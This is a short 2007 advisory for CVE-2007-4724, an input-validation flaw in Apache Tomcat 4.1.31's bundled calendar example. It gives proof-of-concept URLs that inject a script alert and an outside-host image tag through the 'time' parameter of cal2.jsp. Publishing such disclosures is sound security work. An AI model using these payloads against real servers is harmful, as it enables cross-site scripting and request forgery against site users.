Apache tomcat calendar example cross site scripting and cross site request forgery vulnerability

2007.09.07

Credit: Tushar Vartak

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2007-4724

CWE: CWE-352

CVSS Base Score: 4.3/10

Impact Subscore: 2.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: None

Integrity impact: Partial

Availability impact: None

Apache Tomcat/4.1.31 ships with built in examples. One of the example calendar.jsp suffers from input validation error and could be exploited for cross site scriptingand cross site request forgery.
XSS
http://myserver:myport/examples/jsp/cal/cal2.jsp?time=8am%3cscript%3eale
rt("XSS!")%3c%2fscript%3e
XSRF
http://myserver:myport/examples/jsp/cal/cal2.jsp?time=><img%20src="http:
//xsrfxonfirmed.com/testimage.gif">
-
Tushar Vartak

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Apache tomcat calendar example cross site scripting and cross site request forgery vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.